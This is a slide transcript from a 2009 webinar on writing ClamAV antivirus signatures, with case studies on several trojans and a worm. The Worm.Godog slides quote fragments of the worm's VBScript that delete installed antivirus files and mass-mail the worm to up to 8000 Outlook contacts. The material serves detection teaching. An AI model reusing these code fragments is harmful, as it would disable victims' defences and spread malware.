webinar alain-2009-03-04-clamav
DESCRIPTION
How to create signature with Clamav open source antivirusTRANSCRIPT
Writing ClamAV SignaturesAlain Zidouemba
March 4, 2009
2
About the presenter
Alain Zidouemba
• VRT Research Engineer for over a year
• Primary responsibilities:• Malware research & signatures generation – ClamAV• Vulnerability research & rules generation – Snort
• Before Sourcefire: Anti-Malware Research Engineer
3
Outline
What is ClamAVWhere to get ClamAVDifferent ClamAV signature formats:• .hdb• .mdb• .ndb• .ldb
WhitelistingQ & A
ClamAV
5
What is ClamAV?
Clam AntiVirus (ClamAV) is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gatewaysProvides a number of utilities including:• A flexible and scalable multi-threaded daemon
(clamd)• A command line scanner (clamscan)• An advanced tool for automatic database updates
(freshclam)• Sigtool – more later
6
Where can I get ClamAV from?
Latest stable release: ClamAV 0.94.2• http://www.clamav.net/download/sources
Most popular UNIX operating systems are supported:
• GNU/Linux, Solaris, FreeBSD, OpenBSD, Mac OS X
Up-to-date list of binary packages is available at our website:
• http://clamav.net/download/packages
7
Why learn how to write sigs?
I thought Sourcefire released signatures updates several times a day!
8
ClamAV malware detection
Goal: recognize and block malware
Detection is:• File-centric• Focus on recognizing malicious code in file
Not intended to replace desktop AV
First line of defense
9
ClamAV Virus Database (CVD)
The ClamAV project distributes two CVD files• main.cvd• daily.cvd
Sigtool (ships with ClamAV) can display detailed information on CVD files:
10
Various signature files in .cvd archive
Writing signatures for ClamAV
12
Hash database: *.hdb
The format for .hdb files is as follows:• MD5:Size:MalwareName
To create a signature for test.exe use the --md5 option of sigtool:
13
Hash database: *.hdb (cont’d)
That’s it! The signature is ready to be used:
• The name for the detection can be changed:
14
MD5, PE-section based: *.mdb
The format for .mdb files is as follows:• PESectionSize:MD5:MalwareName
The easiest way to generate MD5 based section signatures is to extract target PE sections into separate files and then run sigtool with the option -- mdb:
15
Case study: Trojan.Bagle-328
IDA Pro indicates that the sample is “packed”
Packed with Themida (as per PEiD)
16
Case study: Trojan.Bagle-328 (cont'd)
Themida is used by malware writers...but also by legitimate products – false positive likelyWe can use pe-sig, a Ruby script that will create sigs for each section of a PE file:
Finally, the signature is:• 237568:ce914ca1bbea795a7021854431663623:Trojan.Bagle-328
17
Extended sig. format: *.ndb
The format for .ndb files is as follows:• MalwareName:TargetType:Offset:HexSignature
• TargetType is one of the following numbers specifying the type of the target file:
0: Any file 4: Mail File1: Portable Executable 5: Graphics2: OLE2 component (eg: VBA script) 6: ELF3: HTML (normalized) 7: ASCII text file (normalized)
18
Case study: Trojan.Exchanger
Many files that are very similar yet different
19
Case study: Trojan.Exchanger (cont’d)
5.exe:
Opcode:• e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4
Signature:• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4
20
Case study: Trojan.Exchanger (cont’d)
7.exe:
Opcode:• e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4
Signature:• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4
21
Case study: Trojan.Exchanger (cont’d)
Signature for 5.exe:• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4
Signature for 7.exe:• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4
Signature to detect both 5.exe and 7.exe:• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4
22
Case study: Trojan.Exchanger (cont’d)
Moreover, for 5.exe:• EP: 0x4094E0• Binary string: 0x4095C5
For 7.exe:• EP: 0x406D87• Binary string: 0x406E6C
In both cases the distance between EP and our binary string is the same: 0xE5 = 229 (decimal)
23
Case study: Trojan.Exchanger (cont’d)
Finally we can rewrite the signature to be:• Trojan.Exchanger:1:EP+229:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4
This signature is more precise and even matches other samples:
24
Logical signatures: *.ldb
Logical signatures introduced in ClamAV 0.94The format for .ldb files is as follows:• SignatureName;TargetDescriptionBlock;LogicalExpr
ession;Subsig0;Subsig1;Subsig2;...
25
Case study: Worm.Godog
A mass-mailer worm, code is in VBS
Registro = legion.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")If FileExists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\Avp32.exe") then path = Registro &
"\Kaspersky Lab\Kaspersky Antivirus Personal Pro"legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\*.*")If fileexists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\Avp32.exe") then path = Registro &
"\Kaspersky Lab\Kaspersky Antivirus Personal"legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\*.*")if FileExists(Registro & "\Antiviral Toolkit Pro\avp32.exe") then path = Registros & "\Antiviral Toolkit Pro"legions.DeleteFile (Registro & "\Antiviral Toolkit Pro\*.*")if fileexists (Registro & "\AVPersonal\Avguard.exe") then path = Registro & "\AVPersonal"legions.DeleteFile (Registro & "\AVPersonal\*.*")if fileexists (Registro & "\Trend PC-cillin 98\IOMON98.EXE") then path = Registro & "\Trend PC-cillin 98"legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.*")legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.EXE")legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.dll")
26
Case study: Worm.Godog (cont’d)
After normalization, we can create 4 signatures to detect each attempt to disable AV tools as follows:
(0) Kaspersky Antivirus Personal/Kaspersky Antivirus Personal Pro: 66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c
(1) Antiviral Toolkit Pro: 66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f
(2) AVPersonal: 66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c
(3) Trend PC-cillin 98: 66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e
27
Case study: Worm.Godog (cont’d)
Worm also send itself to the first 8000 contacts found in the address book:
Set Create = CreateObject ("Scripting.FileSystemObject")Set mail = Create.CreateTextFile("C:\mail.vbs")mail.writeline "On Error Resume Next"mail.writeline "Dim leg, Mail, Counter, A, B, C, D, E"mail.writeline "Set leg = CreateObject" & Chr(32)& "(" & chr(34) & "Outlook.Application" & Chr(34) &")"mail.writeline "Set C = CreateObject "& Chr(32) & "(" & chr(34) & "Scripting.FileSystemObject" & Chr(34)& ")"mail.writeline "Set Mail = leg.GetNameSpace" & Chr(32) & "(" & chr(34)& "MAPI" & Chr(34)&")"mail.writeline "For A = 1 To Mail.AddressLists.Count"mail.writeline "Set B = Mail.AddressLists (A)"mail.writeline "Counter = 1"mail.writeline "Set C = leg.CreateItem (0)"mail.writeline "For D = 1 To B.AddressEntries.Count"mail.writeline "E = B.AddressEntries (Counter)"mail.writeline "C.Recipients.Add E"mail.writeline "Counter = Counter + 1"mail.writeline "If Counter > 8000 Then Exit For"mail.writeline "Next"mail.writeline "C.Subject =" & Chr(32) & Chr(34) &"Legion Game" & Chr(34)mail.writeline "C.Body = "& Chr(32) & Chr(34) & "YA jugaste el juego Legion? si no aqui te lo doy checalo y hay me dices que tal..." & Chr(34) mail.writeline "C.Attachments.Add"& Chr(32) & Chr(34) & "C:\Legion.vbs" & Chr(34) mail.writeline "C.DeleteAfterSubmit = True"mail.writeline "C.Send"mail.writeline "Next"mail.Closelegion.Run ("C:\mail.vbs")
28
Case study: Worm.Godog (cont’d)
A signature to detect this worm portion of the file could be:
(4) 666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64
Finally, we can write this highly flexible signature:• Worm.Godog;Target:0;((0|1|2|3)& (4));(0);(1);(2);(3);(4)
in a .ldb file:Worm.Godog;Target:0;((0|1|2|3)& (4));66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c ;66696c6565786973747328{-
25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f; 66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c; 66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e ;666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64
29
Whitelisting
To whitelist a specific file create an entry in a database file with the extension of .fp following the MD5 signature format:
• MD5:FileSize:Comment
30
Whitelisting (cont’d)
To whitelist a specific signature inside main.cvd add the following entry into a local file local.ign:
• db_name:line_number:signature_name
To ignore the “myTestSignature” at line 23 in test.ndb:
• test.ndb:23:myTestSignature
Daily.ign:
31
More questions?
[email protected] - user [email protected] - technical discussionsAlternatively you can try asking on the #clamav IRC channel on irc.freenode.netIf you have questions or comments on this presentation: [email protected]
32
ClamAV/VRT/Sourcefire
Websites• http://www.clamav.net• http://www.snort.org• htttp://www.sourcefire.com
Blogs• http://clam-av.blogspot.com• http://vrt-sourcefire.blogspot.com
33
Contribute
Sample submission• http://www.clamav.net/sendvirus/
Upload statistics:• freshclam --submit-stats
Bug submission• http://bugs.clamav.net
Q & A
35
NOW GO AND WRITE SIGNATURES!
Source: http://www.topnews.in/wireless-worms-may-spread-same-manner-flu-222714